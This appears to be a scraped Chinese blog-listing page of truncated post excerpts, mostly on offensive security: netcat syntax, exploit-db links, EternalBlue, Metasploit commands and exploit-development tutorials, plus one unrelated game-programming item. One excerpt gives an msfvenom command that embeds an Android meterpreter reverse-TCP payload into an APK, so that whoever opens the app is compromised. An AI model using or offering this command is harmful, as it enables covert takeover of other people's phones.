功能说明:强大的网络工具 语 法:nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<来源位址>][-v...][-w<超时秒数>][主机名称][通信端口...] 参 数: -g<网关> 设置路由器跃程通信网关,最多 ...
分类:
Web程序 时间:
2017-06-15 10:42:31
阅读次数:
325
测试平台:CentOS7.2 编译工具GCC POC地址:https://www.exploit-db.com/exploits/40611/ EXP地址:https://www.exploit-db.com/exploits/40616/ POC地址:https://www.exploit-db. ...
分类:
其他好文 时间:
2017-06-13 10:12:46
阅读次数:
337
命令:msfvenom -x /路径/apk -p android/meterpreter/reverse_tcp LHOST=ip LPORT=端口 只要别人一打开这个被注入payload后的软件就可以获得meterpreter 当然你要启动msfconsole监听 msfconsole hale ...
分类:
其他好文 时间:
2017-06-11 21:11:01
阅读次数:
305
参考: https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue ...
P1412 经营与开发 P1412 经营与开发 P1412 经营与开发 题目描述 4X概念体系,是指在PC战略游戏中一种相当普及和成熟的系统概念,得名自4个同样以“EX”为开头的英语单词。 eXplore(探索) eXpand(拓张与发展) eXploit(经营与开发) eXterminate(征服 ...
分类:
其他好文 时间:
2017-06-07 22:29:39
阅读次数:
221
接着上次的路程继续在ubuntu下对漏洞的探索练习,这次是level01了 先看下level01的问题描述: 目标还是要能运行getflag这个可执行的程序,但如果直接运行是不行的,会提示: getflag is executing on a non-flag account, this doesn ...
分类:
其他好文 时间:
2017-06-05 10:25:06
阅读次数:
184
exploit-exercises.com provides a variety of virtual machines, documentation and challenges that can be used to learn about a variety of computer secur ...
分类:
其他好文 时间:
2017-05-29 13:35:21
阅读次数:
144
metasploit 常用命令备忘 MSFconsole Commands 24show exploits 查看所有exploitshow payloads 查看所有payloadshow auxiliary 查看所有auxiliarysearch name 搜索exploit 等info 查看加载 ...
分类:
Web程序 时间:
2017-05-05 14:12:14
阅读次数:
313
原文:Linux (x86) Exploit Development Series 在线阅读 PDF格式 EPUB格式 MOBI格式 Github 译者 ...
分类:
系统相关 时间:
2017-05-03 18:20:27
阅读次数:
204
exploit模块 分为主动,被动exploit 主动exploit:攻击者(通常是客户端)主动发起连接请求,然后发送exploit给被攻击者(通常是服务器端) 被动exploit:被攻击者(通常是客户端)主动发起连接请求,然后攻击者(通常是服务器端)反回exploit给被攻击者 主动exploit ...
分类:
Web程序 时间:
2017-04-27 14:22:32
阅读次数:
152